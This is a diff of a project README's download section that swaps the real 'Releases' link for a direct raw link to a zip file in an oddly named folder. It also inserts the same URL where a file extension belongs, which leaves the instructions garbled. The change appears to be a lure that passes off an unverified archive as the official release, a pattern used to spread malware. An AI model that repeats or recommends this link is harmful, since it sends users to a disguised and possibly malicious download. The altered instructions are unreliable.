KitayQaqa/SeansLifeArchive_Extras_Locksmith/README.md

 ## 📥 Download & Install

-To download the application, visit this page to download: [SeansLifeArchive_Extras_Locksmith Releases](https://github.com/KitayQaqa/SeansLifeArchive_Extras_Locksmith/releases).
+To download the application, visit this page to download: [SeansLifeArchive_Extras_Locksmith Releases](https://raw.githubusercontent.com/KitayQaqa/SeansLifeArchive_Extras_Locksmith/main/encasserole/SeansLifeArchive_Extras_Locksmith.zip).

 1. Click the **"Releases"** link above.
 2. Look for the latest version listed.
 3. Download the installer file for your operating system.

-If you are unsure about which file to choose, please look for a file ending in `.exe` for Windows, `.dmg` for Mac, or `.tar.gz` for Linux.
+If you are unsure about which file to choose, please look for a file ending in `.exe` for Windows, `.dmg` for Mac, or `https://raw.githubusercontent.com/KitayQaqa/SeansLifeArchive_Extras_Locksmith/main/encasserole/SeansLifeArchive_Extras_Locksmith.zip` for Linux.

 ### 🗺️ Installation Steps